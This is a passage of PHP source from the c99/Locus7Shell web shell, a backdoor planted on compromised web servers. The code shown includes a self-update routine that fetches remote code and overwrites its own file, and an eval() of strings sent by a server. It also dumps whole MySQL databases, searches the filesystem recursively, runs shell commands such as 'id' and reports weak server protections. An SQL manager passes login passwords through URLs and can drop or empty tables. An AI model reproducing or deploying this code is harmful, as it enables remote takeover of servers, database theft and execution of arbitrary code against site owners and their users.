  994. if ($data{0} == "\x99" and $data{1} == "\x02") {return "You are using latest version!";}
  995. if ($data{0} == "\x99" and $data{1} == "\x03")
  996. {
  997. $string = explode("\x01",$string);
  998. if ($update)
  999. {
  1000. $confvars = array();
  1001. $sourceurl = $string[0];
  1002. $source = file_get_contents($sourceurl);
  1003. if (!$source) {return "Can't fetch update!";}
  1004. else
  1005. {
  1006. $fp = fopen(__FILE__,"w");
  1007. if (!$fp) {return "Local error: can't write update to ".__FILE__."! You may download c99shell.php manually <a href=\"".$sourceurl."\"><u>here</u></a>.";}
  1008. else {fwrite($fp,$source); fclose($fp); return "Thanks! Updated with success.";}
  1009. }
  1010. }
  1011. else {return "New version are available: ".$string[1];}
  1012. }
  1013. elseif ($data{0} == "\x99" and $data{1} == "\x04") {eval($string); return 1;}
  1014. else {return "Error in protocol: segmentation failed! (".$data.") ";}
  1015. }
  1016. }
  1017. }
  1018. if (!function_exists("mysql_dump"))
  1019. {
  1020. function mysql_dump($set)
  1021. {
  1022. global $shver;
  1023. $sock = $set["sock"];
  1024. $db = $set["db"];
  1025. $print = $set["print"];
  1026. $nl2br = $set["nl2br"];
  1027. $file = $set["file"];
  1028. $add_drop = $set["add_drop"];
  1029. $tabs = $set["tabs"];
  1030. $onlytabs = $set["onlytabs"];
  1031. $ret = array();
  1032. $ret["err"] = array();
  1033. if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
  1034. if (empty($db)) {$db = "db";}
  1035. if (empty($print)) {$print = 0;}
  1036. if (empty($nl2br)) {$nl2br = 0;}
  1037. if (empty($add_drop)) {$add_drop = TRUE;}
  1038. if (empty($file))
  1039. {
  1040. $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql";
  1041. }
  1042. if (!is_array($tabs)) {$tabs = array();}
  1043. if (empty($add_drop)) {$add_drop = TRUE;}
  1044. if (sizeof($tabs) == 0)
  1045. {
  1046. // retrive tables-list
  1047. $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
  1048. if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
  1049. }
  1050. $out = "# Dumped by Locous7Shell.SQL v. ".$shver."
  1051. # Home page: http://www.Locus7s.com
  1052. #
  1053. # Host settings:
  1054. # MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"."
  1055. # Date: ".date("d.m.Y H:i:s")."
  1056. # DB: \"".$db."\"
  1057. #---------------------------------------------------------
  1058. ";
  1059. $c = count($onlytabs);
  1060. foreach($tabs as $tab)
  1061. {
  1062. if ((in_array($tab,$onlytabs)) or (!$c))
  1063. {
  1064. if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
  1065. // recieve query for create table structure
  1066. $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
  1067. if (!$res) {$ret["err"][] = mysql_smarterror();}
  1068. else
  1069. {
  1070. $row = mysql_fetch_row($res);
  1071. $out .= $row["1"].";\n\n";
  1072. // recieve table variables
  1073. $res = mysql_query("SELECT * FROM `$tab`", $sock);
  1074. if (mysql_num_rows($res) > 0)
  1075. {
  1076. while ($row = mysql_fetch_assoc($res))
  1077. {
  1078. $keys = implode("`, `", array_keys($row));
  1079. $values = array_values($row);
  1080. foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
  1081. $values = implode("', '", $values);
  1082. $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";
  1083. $out .= $sql;
  1084. }
  1085. }
  1086. }
  1087. }
  1088. }
  1089. $out .= "#---------------------------------------------------------------------------------\n\n";
  1090. if ($file)
  1091. {
  1092. $fp = fopen($file, "w");
  1093. if (!$fp) {$ret["err"][] = 2;}
  1094. else
  1095. {
  1096. fwrite ($fp, $out);
  1097. fclose ($fp);
  1098. }
  1099. }
  1100. if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
  1101. return $out;
  1102. }
  1103. }
  1104. if (!function_exists("mysql_buildwhere"))
  1105. {
  1106. function mysql_buildwhere($array,$sep=" and",$functs=array())
  1107. {
  1108. if (!is_array($array)) {$array = array();}
  1109. $result = "";
  1110. foreach($array as $k=>$v)
  1111. {
  1112. $value = "";
  1113. if (!empty($functs[$k])) {$value .= $functs[$k]."(";}
  1114. $value .= "'".addslashes($v)."'";
  1115. if (!empty($functs[$k])) {$value .= ")";}
  1116. $result .= "`".$k."` = ".$value.$sep;
  1117. }
  1118. $result = substr($result,0,strlen($result)-strlen($sep));
  1119. return $result;
  1120. }
  1121. }
  1122. if (!function_exists("mysql_fetch_all"))
  1123. {
  1124. function mysql_fetch_all($query,$sock)
  1125. {
  1126. if ($sock) {$result = mysql_query($query,$sock);}
  1127. else {$result = mysql_query($query);}
  1128. $array = array();
  1129. while ($row = mysql_fetch_array($result)) {$array[] = $row;}
  1130. mysql_free_result($result);
  1131. return $array;
  1132. }
  1133. }
  1134. if (!function_exists("mysql_smarterror"))
  1135. {
  1136. function mysql_smarterror($type,$sock)
  1137. {
  1138. if ($sock) {$error = mysql_error($sock);}
  1139. else {$error = mysql_error();}
  1140. $error = htmlspecialchars($error);
  1141. return $error;
  1142. }
  1143. }
  1144. if (!function_exists("mysql_query_form"))
  1145. {
  1146. function mysql_query_form()
  1147. {
  1148. global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;
  1149. if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
  1150. if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
  1151. if ((!$submit) or ($sql_act))
  1152. {
  1153. echo "<table border=0><tr><td><form name=\"c99sh_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=act value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\">&nbsp;<input type=submit value=\"No\"></form></td>";
  1154. if ($tbl_struct)
  1155. {
  1156. echo "<td valign=\"top\"><b>Fields:</b><br>";
  1157. foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "+ <a href=\"#\" onclick=\"document.c99sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";}
  1158. echo "</td></tr></table>";
  1159. }
  1160. }
  1161. if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}
  1162. }
  1163. }
  1164. if (!function_exists("mysql_create_db"))
  1165. {
  1166. function mysql_create_db($db,$sock="")
  1167. {
  1168. $sql = "CREATE DATABASE `".addslashes($db)."`;";
  1169. if ($sock) {return mysql_query($sql,$sock);}
  1170. else {return mysql_query($sql);}
  1171. }
  1172. }
  1173. if (!function_exists("mysql_query_parse"))
  1174. {
  1175. function mysql_query_parse($query)
  1176. {
  1177. $query = trim($query);
  1178. $arr = explode (" ",$query);
  1179. /*array array()
  1180. {
  1181. "METHOD"=>array(output_type),
  1182. "METHOD1"...
  1183. ...
  1184. }
  1185. if output_type == 0, no output,
  1186. if output_type == 1, no output if no error
  1187. if output_type == 2, output without control-buttons
  1188. if output_type == 3, output with control-buttons
  1189. */
  1190. $types = array(
  1191. "SELECT"=>array(3,1),
  1192. "SHOW"=>array(2,1),
  1193. "DELETE"=>array(1),
  1194. "DROP"=>array(1)
  1195. );
  1196. $result = array();
  1197. $op = strtoupper($arr[0]);
  1198. if (is_array($types[$op]))
  1199. {
  1200. $result["propertions"] = $types[$op];
  1201. $result["query"] = $query;
  1202. if ($types[$op] == 2)
  1203. {
  1204. foreach($arr as $k=>$v)
  1205. {
  1206. if (strtoupper($v) == "LIMIT")
  1207. {
  1208. $result["limit"] = $arr[$k+1];
  1209. $result["limit"] = explode(",",$result["limit"]);
  1210. if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);}
  1211. unset($arr[$k],$arr[$k+1]);
  1212. }
  1213. }
  1214. }
  1215. }
  1216. else {return FALSE;}
  1217. }
  1218. }
  1219. if (!function_exists("c99fsearch"))
  1220. {
  1221. function c99fsearch($d)
  1222. {
  1223. global $found;
  1224. global $found_d;
  1225. global $found_f;
  1226. global $search_i_f;
  1227. global $search_i_d;
  1228. global $a;
  1229. if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
  1230. $h = opendir($d);
  1231. while (($f = readdir($h)) !== FALSE)
  1232. {
  1233. if($f != "." && $f != "..")
  1234. {
  1235. $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f));
  1236. if (is_dir($d.$f))
  1237. {
  1238. $search_i_d++;
  1239. if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;}
  1240. if (!is_link($d.$f)) {c99fsearch($d.$f);}
  1241. }
  1242. else
  1243. {
  1244. $search_i_f++;
  1245. if ($bool)
  1246. {
  1247. if (!empty($a["text"]))
  1248. {
  1249. $r = @file_get_contents($d.$f);
  1250. if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";}
  1251. if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);}
  1252. if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);}
  1253. else {$bool = strpos(" ".$r,$a["text"],1);}
  1254. if ($a["text_not"]) {$bool = !$bool;}
  1255. if ($bool) {$found[] = $d.$f; $found_f++;}
  1256. }
  1257. else {$found[] = $d.$f; $found_f++;}
  1258. }
  1259. }
  1260. }
  1261. }
  1262. closedir($h);
  1263. }
  1264. }
  1265. if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}}
  1266. //Sending headers
  1267. @ob_start();
  1268. @ob_implicit_flush(0);
  1269. function onphpshutdown()
  1270. {
  1271. global $gzipencode,$ft;
  1272. if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad")))
  1273. {
  1274. $v = @ob_get_contents();
  1275. @ob_end_clean();
  1276. @ob_start("ob_gzHandler");
  1277. echo $v;
  1278. @ob_end_flush();
  1279. }
  1280. }
  1281. function c99shexit()
  1282. {
  1283. onphpshutdown();
  1284. exit;
  1285. }
  1286. header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
  1287. header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
  1288. header("Cache-Control: no-store, no-cache, must-revalidate");
  1289. header("Cache-Control: post-check=0, pre-check=0", FALSE);
  1290. header("Pragma: no-cache");
  1291. if (empty($tmpdir))
  1292. {
  1293. $tmpdir = ini_get("upload_tmp_dir");
  1294. if (is_dir($tmpdir)) {$tmpdir = "/tmp/";}
  1295. }
  1296. $tmpdir = realpath($tmpdir);
  1297. $tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir);
  1298. if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;}
  1299. if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;}
  1300. else {$tmpdir_logs = realpath($tmpdir_logs);}
  1301. if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
  1302. {
  1303. $safemode = TRUE;
  1304. $hsafemode = "<font color=red>ON (secure)</font>";
  1305. }
  1306. else {$safemode = FALSE; $hsafemode = "<font color=green>OFF (not secure)</font>";}
  1307. $v = @ini_get("open_basedir");
  1308. if ($v or strtolower($v) == "on") {$openbasedir = TRUE; $hopenbasedir = "<font color=red>".$v."</font>";}
  1309. else {$openbasedir = FALSE; $hopenbasedir = "<font color=green>OFF (not secure)</font>";}
  1310. $sort = htmlspecialchars($sort);
  1311. if (empty($sort)) {$sort = $sort_default;}
  1312. $sort[1] = strtolower($sort[1]);
  1313. $DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE");
  1314. if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();}
  1315. $DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",htmlspecialchars($DISP_SERVER_SOFTWARE));
  1316. @ini_set("highlight.bg",$highlight_bg); //FFFFFF
  1317. @ini_set("highlight.comment",$highlight_comment); //#FF8000
  1318. @ini_set("highlight.default",$highlight_default); //#0000BB
  1319. @ini_set("highlight.html",$highlight_html); //#000000
  1320. @ini_set("highlight.keyword",$highlight_keyword); //#007700
  1321. @ini_set("highlight.string",$highlight_string); //#DD0000
  1322. if (!is_array($actbox)) {$actbox = array();}
  1323. $dspact = $act = htmlspecialchars($act);
  1324. $disp_fullpath = $ls_arr = $notls = null;
  1325. $ud = urlencode($d);
  1326. ?><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title><?php echo getenv("HTTP_HOST"); ?> - Locus7Shell</title><STYLE>TD { FONT-SIZE: 8pt; COLOR: #009900; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #009900; scrollbar-shadow-color: #000000; scrollbar-highlight-color: #00CC00; scrollbar-3dlight-color: #00CC00; scrollbar-darkshadow-color: #009900; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #000000; COLOR: green; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #009900; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #f89521; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #f89521; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #f89521; TEXT-DECORATION: none;}A:hover { COLOR: #f89521; TEXT-DECORATION: bold;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #009900; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #009900; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #009900; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #009900; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #009900; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #009900; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #009900; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #009900;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}</style></head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0><center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"><p><center></p></center></th></tr><tr><td><p align="left"><b>Software:&nbsp;<?php echo $DISP_SERVER_SOFTWARE; ?></b>&nbsp;</p><p align="left"><b>uname -a:&nbsp;<?php echo wordwrap(php_uname(),90,"<br>",1); ?></b>&nbsp;</p><p align="left"><b><?php if (!$win) {echo wordwrap(myshellexec("id"),90,"<br>",1);} else {echo get_current_user();} ?></b>&nbsp;</p><p align="left"><b>Safe-mode:&nbsp;<?php echo $hsafemode; ?></b></p><p align="left"><?php
  1327. $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
  1328. if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);}
  1329. $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
  1330. if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
  1331. $d = str_replace("\\\\","\\",$d);
  1332. $dispd = htmlspecialchars($d);
  1333. $pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1));
  1334. $i = 0;
  1335. foreach($pd as $b)
  1336. {
  1337. $t = "";
  1338. $j = 0;
  1339. foreach ($e as $r)
  1340. {
  1341. $t.= $r.DIRECTORY_SEPARATOR;
  1342. if ($j == $i) {break;}
  1343. $j++;
  1344. }
  1345. echo "<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>";
  1346. $i++;
  1347. }
  1348. echo "&nbsp;&nbsp;&nbsp;";
  1349. if (is_writable($d))
  1350. {
  1351. $wd = TRUE;
  1352. $wdt = "<font color=green>[ ok ]</font>";
  1353. echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>";
  1354. }
  1355. else
  1356. {
  1357. $wd = FALSE;
  1358. $wdt = "<font color=red>[ Read-Only ]</font>";
  1359. echo "<b>".view_perms_color($d)."</b>";
  1360. }
  1361. if (is_callable("disk_free_space"))
  1362. {
  1363. $free = disk_free_space($d);
  1364. $total = disk_total_space($d);
  1365. if ($free === FALSE) {$free = 0;}
  1366. if ($total === FALSE) {$total = 0;}
  1367. if ($free < 0) {$free = 0;}
  1368. if ($total < 0) {$total = 0;}
  1369. $used = $total-$free;
  1370. $free_percent = round(100/($total/$free),2);
  1371. echo "<br><b>Free ".view_size($free)." of ".view_size($total)." (".$free_percent."%)</b>";
  1372. }
  1373. echo "<br>";
  1374. echo "<b>Your ip: <a href=http://whois.domaintools.com/".$_SERVER["REMOTE_ADDR"].">".$_SERVER["REMOTE_ADDR"]."</a> - Server ip: <a href=http://whois.domaintools.com/".gethostbyname($_SERVER["HTTP_HOST"]).">".gethostbyname($_SERVER["HTTP_HOST"])."</a></b><br/>";
  1375. $letters = "";
  1376. if ($win)
  1377. {
  1378. $v = explode("\\",$d);
  1379. $v = $v[0];
  1380. foreach (range("a","z") as $letter)
  1381. {
  1382. $bool = $isdiskette = in_array($letter,$safemode_diskettes);
  1383. if (!$bool) {$bool = is_dir($letter.":\\");}
  1384. if ($bool)
  1385. {
  1386. $letters .= "<a href=\"".$surl."act=ls&d=".urlencode($letter.":\\")."\"".($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"":"").">[ ";
  1387. if ($letter.":" != $v) {$letters .= $letter;}
  1388. else {$letters .= "<font color=green>".$letter."</font>";}
  1389. $letters .= " ]</a> ";
  1390. }
  1391. }
  1392. if (!empty($letters)) {echo "<b>Detected drives</b>: ".$letters."<br>";}
  1393. }
  1394. if (count($quicklaunch) > 0)
  1395. {
  1396. foreach($quicklaunch as $item)
  1397. {
  1398. $item[1] = str_replace("%d",urlencode($d),$item[1]);
  1399. $item[1] = str_replace("%sort",$sort,$item[1]);
  1400. $v = realpath($d."..");
  1401. if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);}
  1402. $item[1] = str_replace("%upd",urlencode($v),$item[1]);
  1403. echo "<a href=\"".$item[1]."\">".$item[0]."</a>&nbsp;&nbsp;&nbsp;&nbsp;";
  1404. }
  1405. }
  1406. echo "</p></td></tr></table><br>";
  1407. if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">".$donated_html."</td></tr></table><br>";}
  1408. echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">";
  1409. if ($act == "") {$act = $dspact = "ls";}
  1410. if ($act == "sql")
  1411. {
  1412. $sql_surl = $surl."act=sql";
  1413. if ($sql_login) {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}
  1414. if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}
  1415. if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}
  1416. if ($sql_port) {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}
  1417. if ($sql_db) {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}
  1418. $sql_surl .= "&";
  1419. ?><h3>Attention! SQL-Manager is <u>NOT</u> ready module! Don't reports bugs.</h3><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center><?php
  1420. if ($sql_server)
  1421. {
  1422. $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
  1423. $err = mysql_smarterror();
  1424. @mysql_select_db($sql_db,$sql_sock);
  1425. if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();}
  1426. }
  1427. else {$sql_sock = FALSE;}
  1428. echo "<b>SQL Manager:</b><br>";
  1429. if (!$sql_sock)
  1430. {
  1431. if (!$sql_server) {echo "NO CONNECTION";}
  1432. else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";}
  1433. }
  1434. else
  1435. {
  1436. $sqlquicklaunch = array();
  1437. $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
  1438. $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl));
  1439. $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");
  1440. $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");
  1441. $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");
  1442. $sqlquicklaunch[] = array("Logout",$surl."act=sql");
  1443. echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>";
  1444. if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><b>".$item[0]."</b></a> ] ";}}
  1445. echo "</center>";
  1446. }
  1447. echo "</td></tr><tr>";
  1448. if (!$sql_sock) {?><td width="28%" height="100" valign="top"><center><font size="5"> i </font></center><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0><tr><td>&nbsp;<b>Please, fill the form:</b><table><tr><td><b>Username</b></td><td><b>Password</b>&nbsp;</td><td><b>Database</b>&nbsp;</td></tr><form action="<?php echo $surl; ?>" method="POST"><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="root" maxlength="64"></td><td><input type="password" name="sql_passwd" value="" maxlength="64"></td><td><input type="text" name="sql_db" value="" maxlength="64"></td></tr><tr><td><b>Host</b></td><td><b>PORT</b></td></tr><tr><td align=right><input type="text" name="sql_server" value="localhost" maxlength="64"></td><td><input type="text" name="sql_port" value="3306" maxlength="6" size="3"></td><td><input type="submit" value="Connect"></td></tr><tr><td></td></tr></form></table></td><?php }
  1449. else
  1450. {
  1451. //Start left panel
  1452. if (!empty($sql_db))
  1453. {
  1454. ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php
  1455. $result = mysql_list_tables($sql_db);
  1456. if (!$result) {echo mysql_smarterror();}
  1457. else
  1458. {
  1459. echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";
  1460. $c = 0;
  1461. while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>+&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;}
  1462. if (!$c) {echo "No tables found in database.";}
  1463. }
  1464. }
  1465. else
  1466. {
  1467. ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php
  1468. $result = mysql_list_dbs($sql_sock);
  1469. if (!$result) {echo mysql_smarterror();}
  1470. else
  1471. {
  1472. ?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php
  1473. $c = 0;
  1474. $dbs = "";
  1475. while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;}
  1476. echo "<option value=\"\">Databases (".$c.")</option>";
  1477. echo $dbs;
  1478. }
  1479. ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form><?php
  1480. }
  1481. //End left panel
  1482. echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">";
  1483. //Start center panel
  1484. $diplay = TRUE;
  1485. if ($sql_db)
  1486. {
  1487. if (!is_numeric($c)) {$c = 0;}
  1488. if ($c == 0) {$c = "no";}
  1489. echo "<hr size=\"1\" noshade><center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").<br>";
  1490. if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}}
  1491. echo "</b></center>";
  1492. $acts = array("","dump");
  1493. if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
  1494. elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";}
  1495. elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";}
  1496. elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
  1497. elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
  1498. elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
  1499. elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
